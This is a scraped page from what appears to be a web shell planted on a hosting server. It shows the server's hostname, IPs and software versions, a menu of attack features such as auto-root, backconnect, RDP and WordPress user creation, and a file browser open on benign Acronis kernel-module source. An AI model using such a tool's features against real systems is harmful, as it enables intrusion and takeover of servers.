Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.138
674 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
file_protector-1.1-1524 /
transport /
[ HOME SHELL ]
Name
Size
Permission
Action
device.c
1.18
KB
-rw-r--r--
device.h
257
B
-rw-r--r--
exit_event.c
1.23
KB
-rw-r--r--
exit_event.h
352
B
-rw-r--r--
fork_event.c
946
B
-rw-r--r--
fork_event.h
403
B
-rw-r--r--
fs_event.c
19.89
KB
-rw-r--r--
fs_event.h
1.92
KB
-rw-r--r--
message.c
13.12
KB
-rw-r--r--
message.h
3.77
KB
-rw-r--r--
ring.h
2.29
KB
-rw-r--r--
set.h
1.86
KB
-rw-r--r--
thread_safe_path.h
2.28
KB
-rw-r--r--
transport.c
50.01
KB
-rw-r--r--
transport.h
2.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : device.c
/** @file @brief 'transport' device @details Copyright (c) 2017 Acronis International GmbH @author Mikhail Krivtsov (mikhail.krivtsov@acronis.com) @since $Id: $ */ #include "device.h" #include "debug.h" // DPRINTF #include "memory.h" #include "transport.h" #include "transport_protocol.h" #include <linux/errno.h> // error codes: ENOMEM #include <linux/fs.h> #include <linux/miscdevice.h> static const struct file_operations operations = { .owner = THIS_MODULE, .open = transport_device_open, .llseek = no_llseek, .read = transport_device_read, .write = transport_device_write, .unlocked_ioctl = transport_device_ioctl, .release = transport_device_release, .mmap = transport_device_mmap, }; static struct miscdevice miscdevice = { .minor = MISC_DYNAMIC_MINOR, .name = TRANSPORT_DEVICE_NAME, .fops = &operations, }; int __init device_mod_init(void) { int ret; ret = misc_register(&miscdevice); if (ret) { EPRINTF("'misc_register()' failure %i", ret); goto out; } DPRINTF("miscdevice.minor=%i", miscdevice.minor); // Note: 'ret' is already 0 here out: return ret; } void device_mod_down(void) { DPRINTF(""); misc_deregister(&miscdevice); DPRINTF(""); }
Close